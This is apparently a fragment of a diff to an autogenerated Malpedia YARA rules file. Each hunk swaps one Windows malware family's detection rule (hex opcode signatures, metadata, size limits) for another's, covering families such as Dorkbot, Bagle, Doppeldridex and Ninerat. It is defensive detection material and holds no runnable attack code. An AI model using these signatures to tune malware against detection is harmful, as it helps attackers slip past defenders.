+		$sequence_8 = { e8???????? 8d8d40fdffff 51 bb05000000 56 8d4d94 885dfc }
+		$sequence_9 = { ff15???????? 399d60fcffff 8b854cfcffff 7306 8d854cfcffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 4177920
 }
-rule MALPEDIA_Win_Zumanek_Auto : FILE
+rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87aee693-fd24-5045-ad68-bbf967fca577"
+		id = "95e01109-549b-5610-b7bb-c1343e7b4ee5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zumanek_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dorkbot_ngrbot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "692948458546aa7f1172f720f7a047815fbd39df276c694923c84a71f1135e40"
+		logic_hash = "ea5d98b6b45b739ecbab0036be4d19cc99f655fde99b26bfe861c5599dba1365"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119138,32 +119178,32 @@ rule MALPEDIA_Win_Zumanek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fc 81fe382e9330 97 e412 3dd16312c9 103f 0800 }
-		$sequence_1 = { 8802 98 811212242434 48 3c91 4a }
-		$sequence_2 = { 894612 4d 2454 48 5b 91 }
-		$sequence_3 = { 71ef 1a6f35 e30b 5d fc 77f2 f1 }
-		$sequence_4 = { 1dba45e22f 91 7c8b e459 0920 122424 }
-		$sequence_5 = { 386b95 4c 53 196a17 }
-		$sequence_6 = { 4a e8???????? 86b71986f742 06 58 4c 8812 }
-		$sequence_7 = { c101f6 53 32b879629b65 76a2 43 fc }
-		$sequence_8 = { d9c3 ab 5f c50f 9d 54 f233591b }
-		$sequence_9 = { 5a c59cd53a93a658 98 9f f5 6b80e7fa856bb2 55 }
+		$sequence_0 = { 85c0 740c 8b8cb51cffffff 51 ffd0 eb0d 8b94b51cffffff }
+		$sequence_1 = { 85f6 0f84a8020000 6a00 6800040000 8d9578fbffff }
+		$sequence_2 = { ff15???????? 85c0 0f8c9f000000 8b4508 85c0 0f8494000000 8b4dfc }
+		$sequence_3 = { e8???????? 8bf0 83c408 85f6 0f84dc000000 6a06 68???????? }
+		$sequence_4 = { 51 7416 68???????? 52 50 e8???????? 83c410 }
+		$sequence_5 = { 8b4d0c 51 50 6a00 ff15???????? 50 ff15???????? }
+		$sequence_6 = { 8d85f1feffff 6a00 50 c685f0feffff00 e8???????? 8b4d14 83c40c }
+		$sequence_7 = { 8d8500f8ffff 50 ff15???????? 8b550c 8b4508 8d8d00f8ffff 51 }
+		$sequence_8 = { 8d55f0 52 68???????? e8???????? 83c40c 85c0 7530 }
+		$sequence_9 = { b8???????? 5b 8be5 5d c3 ff15???????? 5e }
 
 	condition:
-		7 of them and filesize < 58867712
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Stowaway_Auto : FILE
+rule MALPEDIA_Win_Bagle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fff7cfff-aed4-5ea2-8664-de07b4f99127"
+		id = "fe60543c-8794-58a6-ba42-981191e2cc82"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stowaway_auto.yar#L1-L199"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bagle_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "84a539e785b0d71993d13deb34a2d8f732a0d59ec389deb587ebb307e97415d7"
+		logic_hash = "eb49ea6ae472fea8285550f6b2bf1be9757590ced359fd50f12f529f0e70029d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119177,42 +119217,32 @@ rule MALPEDIA_Win_Stowaway_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 76e8 77e8 78e8 79e8 }
-		$sequence_1 = { 78e8 79e8 7ae8 ce f67be8 }
-		$sequence_2 = { ce f67be8 7ce8 7de8 }
-		$sequence_3 = { a3???????? 4e fb b501 }
-		$sequence_4 = { 751e 53 2661 6d b040 3d1db5094f }
-		$sequence_5 = { 2a37 e394 5e b5a9 0e 2cc6 ec }
-		$sequence_6 = { 5b 6b5e045f aa 43 9a7f6eb1f75c72 7f30 fa }
-		$sequence_7 = { 50 91 3e06 48 52 2692 4e }
-		$sequence_8 = { 1b7f1c b567 8110932238ba 81f82f2437b0 645b f257 326640 }
-		$sequence_9 = { d4ff 57 ed 7a80 51 80534080 }
-		$sequence_10 = { 99 0039 801002 3900 99 }
-		$sequence_11 = { e774 5b 004f49 5c }
-		$sequence_12 = { 8d843000a03b00 01f3 50 83c708 }
-		$sequence_13 = { 777c 7781 7782 7783 7786 7787 }
-		$sequence_14 = { 3c77 0c35 f20b18 40 }
-		$sequence_15 = { f3676d 51 99 9f 4b 8099543c7bbf7a }
-		$sequence_16 = { a5 ed 91 34cf }
-		$sequence_17 = { 60 41 69e038173794 6c 5c d10f }
-		$sequence_18 = { d7 80cf73 c9 f0f3f9 }
-		$sequence_19 = { a4 49 07 04bc 3c2f }
+		$sequence_0 = { b03d f3aa 5b 5f }
+		$sequence_1 = { e340 ac c1e010 83f901 740b }
+		$sequence_2 = { 56 57 53 8b7508 8b7d0c 8b4d10 33db }
+		$sequence_3 = { 6a00 6a00 6a04 50 e8???????? 0bc0 }
+		$sequence_4 = { 042b aa c3 55 8bec }
+		$sequence_5 = { 68???????? e8???????? 68???????? 68???????? e8???????? 6804010000 }
+		$sequence_6 = { 2bf9 b03d f3aa 5b }
+		$sequence_7 = { 2bf9 b03d f3aa 5b 5f 5e }
+		$sequence_8 = { 0bc0 7426 6880000000 68???????? }
+		$sequence_9 = { 668945f2 c745f400000000 6a06 6a01 6a02 e8???????? 8bd8 }
 
 	condition:
-		7 of them and filesize < 8003584
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE
+rule MALPEDIA_Win_Ssload_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66ff4a00-02d0-5dfa-b2f7-7b3271a8876d"
+		id = "30dda8cc-ed50-5e35-9e3b-577f2e01ce05"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptic_convo_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ssload"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ssload_auto.yar#L1-L187"
 		license_url = "N/A"
-		logic_hash = "e28456acfbd5652f4b94b426affd2f208681769134e3003d7681a2d2c78d8e5f"
+		logic_hash = "ac05084ef9800673d1ca7ea15965552cfd923f1e160cfabe8236802f68f627b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119226,32 +119256,41 @@ rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 57 8bf1 e8???????? ff7674 8b3d???????? 6a01 }
-		$sequence_1 = { 2b459c ff7674 2bc7 40 99 2bc2 }
-		$sequence_2 = { c3 6800090000 6a00 e8???????? }
-		$sequence_3 = { 034d08 bb00300000 663bd3 7505 }
-		$sequence_4 = { 8b450c 53 8985ecfcffff 8b4514 56 8985f0fcffff 57 }
-		$sequence_5 = { 6a5c 85f6 7403 56 }
-		$sequence_6 = { 7905 4a 83cafe 42 7510 ff85b4feffff 8b95b4feffff }
-		$sequence_7 = { 8b85ecfcffff 8b95f4fcffff 53 ff7510 89540134 50 }
-		$sequence_8 = { 50 e8???????? 83c40c 33c0 8a88b0664000 888c05dc010000 }
-		$sequence_9 = { 3b85d4fcffff 750e 8b4610 03461c 8985a8fdffff eb0b }
+		$sequence_0 = { 894dd4 51 8945e0 ff10 83c404 }
+		$sequence_1 = { f7e1 c1ea03 8d0492 8d0442 }
+		$sequence_2 = { 50 e8???????? 83c40c 01de 89770c e9???????? 8b770c }
+		$sequence_3 = { 85f6 b8ffffffff 0f48f8 81ff01020000 }
+		$sequence_4 = { c745d002000000 648b0d00000000 894de8 64a300000000 }
+		$sequence_5 = { 0fb6f0 83fe0c 7e0c 83fe1f 7e14 83fe20 7418 }
+		$sequence_6 = { 89d5 57 53 52 e8???????? 83c40c }
+		$sequence_7 = { 56 83ec2c 8b5c2444 8b6c2440 }
+		$sequence_8 = { 0f57c0 0f1144240c 894c2408 89442404 }
+		$sequence_9 = { 83ec0c 8db53cffffff 8baeb0000000 8b4608 }
+		$sequence_10 = { 83c40c 037de0 8b55d8 39d7 }
+		$sequence_11 = { 0345e8 2b45d4 8945dc e9???????? }
+		$sequence_12 = { 034828 8b55fc 894a2c eb0a }
+		$sequence_13 = { 034228 8945c4 6a00 6a01 6800000010 }
+		$sequence_14 = { 034a10 894de0 8b45e0 3b45dc 7606 8b4de0 894ddc }
+		$sequence_15 = { ffd1 83c408 ebbc 8b55fc 8b4208 50 e8???????? }
+		$sequence_16 = { 034214 50 8b4df8 51 e8???????? }
+		$sequence_17 = { 03420c 50 ff15???????? 8945f8 837df800 }
+		$sequence_18 = { 034110 50 8b550c 52 8b4de8 e8???????? }
 
 	condition:
-		7 of them and filesize < 97280
+		7 of them and filesize < 4950016
 }
-rule MALPEDIA_Win_Oni_Auto : FILE
+rule MALPEDIA_Win_Pterois_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de723d64-30bf-5667-a979-f8186ef8b8cb"
+		id = "3320c746-a1fd-5d65-8bd9-a08cf7741ea4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oni_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pterois"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pterois_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "e7a58256b76e741c7c3e2e9d7af61ce1190ab07a3a92bb457114a7c15de62838"
+		logic_hash = "40d01f41f8c6ab0bf9862ea3d2722b533235ff4ec8c712399aa15cc1e9f9196b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119265,32 +119304,32 @@ rule MALPEDIA_Win_Oni_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8c24f0000000 c78424040100000f000000 c784240001000000000000 c68424f000000000 }
-		$sequence_1 = { 83f904 0f828d000000 83f923 0f8789000000 8bc8 }
-		$sequence_2 = { 8b4804 8d41f8 89840d14ffffff 8d4580 50 c74580b83a4300 e8???????? }
-		$sequence_3 = { 7603 6a26 58 0fb60c8536bf4200 0fb6348537bf4200 8bf9 8985b4f8ffff }
-		$sequence_4 = { 7420 6bc618 57 8db86c854300 57 ff15???????? }
-		$sequence_5 = { 8bc1 83e13f c1f806 6bc930 8b048590884300 f644082801 7406 }
-		$sequence_6 = { 83e03f c1ff06 6bd830 8b04bd90884300 f644032801 7444 837c0318ff }
-		$sequence_7 = { 8b550c 3b5df0 0f82cefeffff eb20 8b0c8d90884300 }
-		$sequence_8 = { 8d85f8fdffff 6a00 50 e8???????? 83c40c 8d85f8feffff }
-		$sequence_9 = { eb02 33f6 53 8d4dd0 e8???????? 807dd400 750a }
+		$sequence_0 = { 0f82ff620000 4981f800001800 730d 4981f800200000 0f83c9620000 c5fe6f02 c4a17e6f6c02e0 }
+		$sequence_1 = { 33c9 4c8d057c180100 488d154d6a0100 e8???????? 4885c0 7415 49ba7030525e472705d3 }
+		$sequence_2 = { c744243000000000 8b442430 89442424 488b4c2440 4831e1 e8???????? 8b442424 }
+		$sequence_3 = { 75dd 488d055b500100 483bd8 74d1 488bcb e8???????? ebc7 }
+		$sequence_4 = { c7401808000000 488b4c2468 488d442470 4829c1 488b442458 48034810 }
+		$sequence_5 = { 4829c4 8b842498100000 8b842490100000 488b05???????? 4831e0 4889842460100000 4c894c2458 }
+		$sequence_6 = { 48890d???????? e8???????? 4c8d0d91ce0100 4c8bc0 b201 b9fdffffff e8???????? }
+		$sequence_7 = { e8???????? 488b05???????? 4889442430 488d8c24600c0000 e8???????? 4889c1 }
+		$sequence_8 = { e8???????? 83f800 0f851c000000 488b05???????? 488b4c2440 }
+		$sequence_9 = { e8???????? 4889442420 48837c242000 0f840c000000 488b442420 c7401802000000 488b442420 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 528384
 }
-rule MALPEDIA_Win_Beast_Auto : FILE
+rule MALPEDIA_Win_Newpass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8074f5ee-0705-556f-a60f-20fb83a7b6d6"
+		id = "d6b059ee-c4d5-5cd3-bec7-199d16e8018e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beast"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beast_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newpass_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "2393b8a862cb3a2be574fd4cc7aaf3b89fb385083cd12b93e8f9ad9b9f239f88"
+		logic_hash = "68e2df4904722bca2b5d5336a84032d81343ac67dcb544535e3fd89fb775b501"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119303,33 +119342,33 @@ rule MALPEDIA_Win_Beast_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { 56 57 33ff 6a03 47 59 }
-		$sequence_1 = { 330c8550b44f00 334d1c 83c520 894c242c 83ef01 0f85f0fdffff 8b442410 }
-		$sequence_2 = { c6857fffffff41 c6458033 c6458141 c6458224 c6458341 c6458420 c6458541 }
-		$sequence_3 = { eb08 8b4dc4 e8???????? 8bc6 5e c9 c3 }
-		$sequence_4 = { c6855cfcffff4d 889d5dfcffff c6855efcffff4c 889d5ffcffff c68560fcffff5b 889d61fcffff 889d62fcffff }
-		$sequence_5 = { 33b1393e5000 8b4c2448 0fb6c9 c1e104 33b9303e5000 33b1343e5000 8b4c2428 }
-		$sequence_6 = { 6a3f 5a 6a06 898c244a010000 8db424b8000000 898c2452010000 8dbc2460010000 }
-		$sequence_7 = { 8d143e 03c2 8945f0 8b45cc c1e017 0bc8 8b45cc }
-		$sequence_8 = { 8b45c8 03c3 33d0 c1c210 8d0c16 8b75f4 33d9 }
-		$sequence_9 = { c6459025 8bd3 c6459156 c6459223 c6459356 c6459435 }
+	strings:
+		$sequence_0 = { 4c89642438 4c89742428 48ffc0 418bf0 4c8bf2 }
+		$sequence_1 = { 4c8bc3 4c8d4820 4889442420 e8???????? 488b442440 4883c028 4883c430 }
+		$sequence_2 = { cc 4885d2 7509 33c9 ff15???????? cc 4533c9 }
+		$sequence_3 = { 488b4c2430 4885c9 7417 488b11 ff5210 4885c0 740c }
+		$sequence_4 = { 66895d00 6685c0 7505 4c8bc3 eb0f 4c8bc7 90 }
+		$sequence_5 = { e8???????? 488bf8 eb03 488bfe 488d55d8 e8???????? 488bd8 }
+		$sequence_6 = { b850800000 e8???????? 482be0 48c7442428feffffff 48899c2470800000 4889b42478800000 488b05???????? }
+		$sequence_7 = { 84c0 0f84c6000000 488b03 48634804 4803cb 488d9424c8000000 e8???????? }
+		$sequence_8 = { 4d8d0c18 482bf9 48c1ff05 488bcf 48d1e9 498bc2 482bc1 }
+		$sequence_9 = { 57 4154 4155 4156 4157 488dac24d8deffff b828220000 }
 
 	condition:
-		7 of them and filesize < 2411520
+		7 of them and filesize < 2654208
 }
-rule MALPEDIA_Win_Usbferry_Auto : FILE
+rule MALPEDIA_Win_Narilam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "099a1369-e001-5f55-b4f6-6858d99ec27a"
+		id = "54e32c98-3d91-5f09-b5aa-2a231fe53ae4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.usbferry_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.narilam_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "a271aa110aa02149e584931e66f43eb3286c2529fb4319139aeea9b3438deb58"
+		logic_hash = "d58f6ba2ee444c0612b61b483f3c9e07a728833887fe26863735ef4c04a1aac5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119343,40 +119382,34 @@ rule MALPEDIA_Win_Usbferry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c4c 750c 0fbec0 42 89442428 }
-		$sequence_1 = { 83c40c c785b0f7ffff44000000 c785dcf7ffff01000000 33d2 }
-		$sequence_2 = { ff5018 8bf0 83feff 7504 }
-		$sequence_3 = { 33c5 8945fc c645f463 c645f56d }
-		$sequence_4 = { 8b15???????? 8bcb ff7210 898214010000 }
-		$sequence_5 = { 88441de0 8a0439 88441de1 83c302 }
-		$sequence_6 = { 83c40c 8d85c4e9ffff 50 a1???????? ff90a4000000 }
-		$sequence_7 = { e8???????? 8b459c 807b0c67 750c 85c0 }
-		$sequence_8 = { 8981c8000000 8b09 e8???????? 8b0d???????? }
-		$sequence_9 = { 8b45cc e9???????? 8b55e0 52 ff15???????? 837d1401 0f8583000000 }
-		$sequence_10 = { 50 e8???????? 83c40c 8b4d08 51 8d55f4 }
-		$sequence_11 = { 7547 6a04 8d4d1c 51 8b5514 52 }
-		$sequence_12 = { 50 8d8db0f7ffff 51 6a00 6a00 6800000008 6a00 }
-		$sequence_13 = { c645b45c c645b54d c645b669 c645b763 }
-		$sequence_14 = { 83c009 eb4d 84db 0f94c0 83c00b eb43 }
-		$sequence_15 = { c3 3b0d???????? f27502 f2c3 f2e960030000 55 }
+		$sequence_0 = { e8???????? 66c785b0feffff2c03 ba???????? 8d85e0feffff e8???????? ff85bcfeffff 8d95e0feffff }
+		$sequence_1 = { e8???????? 84c0 7434 8b4370 50 8d45d0 50 }
+		$sequence_2 = { e8???????? 50 ff45d8 ba???????? 8d45f4 e8???????? ff45d8 }
+		$sequence_3 = { ff8d4cfeffff 8d8548ffffff ba02000000 e8???????? 66c78540feffff0c02 ba???????? 8d8544ffffff }
+		$sequence_4 = { 8d850cffffff ba02000000 e8???????? 66c785b0feffffb402 ba???????? 8d8508ffffff e8???????? }
+		$sequence_5 = { 6683f822 7407 8bc3 e8???????? 5b c3 80b8ec01000001 }
+		$sequence_6 = { e8???????? ff4df8 ff4df8 6a00 68???????? e8???????? }
+		$sequence_7 = { e8???????? 8b500c 8d45f8 e8???????? 8b45f8 50 8b8378010000 }
+		$sequence_8 = { ff8de8feffff 8d45cc ba02000000 e8???????? 66c785dcfeffff7400 ba???????? 8d45c8 }
+		$sequence_9 = { 7506 803f00 7401 47 8b4508 8978fc 5f }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 3325952
 }
-rule MALPEDIA_Win_Doppeldridex_Auto : FILE
+rule MALPEDIA_Win_Dadjoke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "daa7948f-1af7-5dc7-b72c-52142db6eff9"
+		id = "ea7282f2-8a4c-5601-bbd1-b76f58e52bc1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doppeldridex_auto.yar#L1-L180"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dadjoke_auto.yar#L1-L228"
 		license_url = "N/A"
-		logic_hash = "c03ed87815d6a97d4f986f8009113427e6594093f0809ec3f0f49a2c2120349d"
+		logic_hash = "9c73a5622c3f32fd5cf8900e0843a3bbc9bcae66e0aa7ecc5e1cf55e72cc18b5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -119388,38 +119421,45 @@ rule MALPEDIA_Win_Doppeldridex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 33c0 48 8bfe 8bda 2bf8 2bd8 }
-		$sequence_1 = { e8???????? e9???????? 55 83ec68 33d2 42 }
-		$sequence_2 = { 8b74243c 6a30 8b2f 56 8d4c2408 c6450000 e8???????? }
-		$sequence_3 = { 6880000000 ffb4249c010000 ffb424b4010000 ffb42498000000 56 8d4c2428 8d91e0000000 }
-		$sequence_4 = { 33c0 48 2bc8 2bd0 0bca 0f84b1000000 8d9424a4010000 }
-		$sequence_5 = { 8b02 40 8902 83f80a 0f85fefdffff e9???????? c784249000000000000000 }
-		$sequence_6 = { ff742410 50 6a00 52 ff742428 }
-		$sequence_7 = { 2bf8 2bd8 0bfb 0f8443030000 8d942490000000 8b02 }
-		$sequence_8 = { eb2b 31c0 8b4d88 83c104 }
-		$sequence_9 = { 0f92c4 8a6db3 20cd 20e5 f6c501 8955b4 7518 }
-		$sequence_10 = { 8b458c 8944240c 8b55a4 ffd2 83ec10 }
-		$sequence_11 = { 894de4 e8???????? 83f800 8945e0 74c2 }
-		$sequence_12 = { e8???????? 31c0 8945e8 eb51 31c0 }
-		$sequence_13 = { 01de 8b06 8bb550ffffff 8b5e08 8b4da8 01f9 890c24 }
-		$sequence_14 = { 6683ff00 89d3 8945b8 8955d0 8975d4 895ddc }
-		$sequence_15 = { 8b4df0 39c8 8945dc 72d2 ebb6 55 89e5 }
+		$sequence_0 = { 56 57 6800081000 6a00 }
+		$sequence_1 = { 52 8b4508 0528020000 50 8b0d???????? }
+		$sequence_2 = { 83ec40 56 57 8d45e0 50 e8???????? }
+		$sequence_3 = { 8b45e8 50 e8???????? 83c404 898578ffffff }
+		$sequence_4 = { e8???????? 83c408 8945f8 8b4d08 8b5110 52 8b45f8 }
+		$sequence_5 = { 8845f4 8345d801 807df400 75ee 8b4dd8 }
+		$sequence_6 = { 8b4df4 8dbc0d2cffffff b910000000 8d75ac f3a5 8b55f4 83c240 }
+		$sequence_7 = { 83c414 8b4df4 64890d00000000 8be5 5d c20800 }
+		$sequence_8 = { 33c9 84c0 0f94c1 8bc1 c3 a1???????? }
+		$sequence_9 = { 5e c3 8bff 55 8bec 83ec10 33c0 }
+		$sequence_10 = { e8???????? c3 6a04 e8???????? 59 c3 6a0c }
+		$sequence_11 = { ff15???????? 85c0 7417 b920000000 }
+		$sequence_12 = { 5d c3 6a04 8d458c c7458c80330000 50 }
+		$sequence_13 = { 84c0 75ef b82f000000 8d55f4 }
+		$sequence_14 = { 6a07 6a00 ff15???????? 85c0 0f881f010000 }
+		$sequence_15 = { 83fe04 7ce7 8d45f4 c645f800 }
+		$sequence_16 = { 7508 807e015a 7502 ffd6 6800400000 }
+		$sequence_17 = { 8b1d???????? 51 e8???????? 8bf0 83c404 85f6 }
+		$sequence_18 = { 0f85b5000000 50 ff15???????? 8d85e4faffff 50 }
+		$sequence_19 = { d9c9 d9f1 833d????????00 0f85cc140000 }
+		$sequence_20 = { 6804010000 85c0 57 6a00 }
+		$sequence_21 = { 55 8bec 8b4d0c 85c9 7454 8b5508 8b4514 }
+		$sequence_22 = { 83e908 8d7608 660fd60f 8d7f08 8b048db47c7300 ffe0 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Ninerat_Auto : FILE
+rule MALPEDIA_Win_Scoring_Math_Tea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2759270-ef98-5410-b5fe-ea53f4bf72fd"
+		id = "6a5f2479-dd77-5460-b6ab-7a1fa699026a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ninerat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ninerat_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scoring_math_tea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scoring_math_tea_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "584fb25ea88956dd53544245e507dba7752ef5bd9498b76883c7fb9cf338d1d3"
+		logic_hash = "a12d9d501b7d3baa59a060b6fa56cd1bfb57e15b553bc88c44e1282cce7ff1d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119433,38 +119473,32 @@ rule MALPEDIA_Win_Ninerat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c89ad58feffff 48894d10 48895518 488b4518 48c70000000000 48c7400800000000 48c78590feffff00000000 }
-		$sequence_1 = { 4c89ad60ffffff 4c89b568ffffff 4c89bd70ffffff 48894d10 }
-		$sequence_2 = { 4c89ad58ffffff 4c89b560ffffff 4c89bd68ffffff 48894d10 4889d3 4d89c4 498bd4 }
-		$sequence_3 = { 4c89ad50ffffff 4c89b558ffffff 4c89bd60ffffff 48894d10 4889d6 c68570ffffff00 488d4580 }
-		$sequence_4 = { 4c89ad68fcffff 4c89b570fcffff 4c89bd78fcffff 48894d10 }
-		$sequence_5 = { 4c89ad50ffffff 4c89b558ffffff 4c89bd60ffffff 48895518 4989cc 48c70200000000 4889d1 }
-		$sequence_6 = { 4c89ad60feffff 4c89b568feffff 48894d10 488d4d10 e8???????? 48898570feffff }
-		$sequence_7 = { 4c89ad58fdffff 4c89b560fdffff 4c89bd68fdffff 48895518 4c894520 4c894d28 }
-		$sequence_8 = { eb0f 488bd3 488d0d48900100 e8???????? }
-		$sequence_9 = { 4889842430020000 4c89642450 488b442450 4889842438020000 }
-		$sequence_10 = { 4889842480000000 488d1529890100 488d8c2480000000 e8???????? 90 e8???????? 90 }
-		$sequence_11 = { 488d842430030000 48ffc7 6644393478 75f6 }
-		$sequence_12 = { 4883ec38 834c2448ff 488d05a8580100 4d85c9 }
-		$sequence_13 = { 4a8b04e8 42385cf839 0f84c2000000 488d058dde0000 4a8b0ce8 }
-		$sequence_14 = { 418bd4 e8???????? f20f1000 8b5808 e9???????? 488d05cbdd0000 }
-		$sequence_15 = { 83fa04 7c39 458bd1 49c1ea02 418bc2 f7d8 }
+		$sequence_0 = { 448bfe 448be6 89742450 4889b42420010000 0f57c0 f30f7f842430010000 4533c0 }
+		$sequence_1 = { 66894dea 488d4de0 0fb700 668945ec 33c0 }
+		$sequence_2 = { 4889458c 33c0 894594 66894598 48b85700650064000000 4889459a 33c0 }
+		$sequence_3 = { 83ef01 7986 4885db 743d 488b45af 482bc3 48c1f802 }
+		$sequence_4 = { 83e00a eb09 33c0 eb05 b80a000000 488b5c2430 }
+		$sequence_5 = { e8???????? 90 488d4c2420 e8???????? 4889742420 4889742430 4889742438 }
+		$sequence_6 = { 49ffc6 4183c708 443b3a 72d7 8b02 }
+		$sequence_7 = { 410fb702 6643390413 7515 4983c202 4883ef01 75eb 4c8bc1 }
+		$sequence_8 = { e8???????? 458d41ff 41bfffff0000 8d7a02 4963c8 664139b44a18100000 7511 }
+		$sequence_9 = { 49ffc1 413801 7513 4883c108 49ffc1 8a01 413801 }
 
 	condition:
-		7 of them and filesize < 7709696
+		7 of them and filesize < 881664
 }
-rule MALPEDIA_Win_Conficker_Auto : FILE
